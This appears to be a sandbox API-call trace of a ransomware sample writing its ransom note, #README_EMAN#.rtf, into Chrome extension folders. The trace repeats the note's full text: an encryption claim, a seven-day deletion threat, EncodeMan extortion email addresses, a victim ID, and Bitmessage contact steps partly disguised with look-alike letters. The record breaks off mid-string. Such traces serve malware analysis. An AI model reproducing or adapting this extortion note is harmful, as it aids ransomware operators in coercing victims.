ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.147] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.148] CloseHandle (hObject=0x2e8) returned 1 [0292.148] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0292.148] GetLastError () returned 0x2 [0292.148] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and 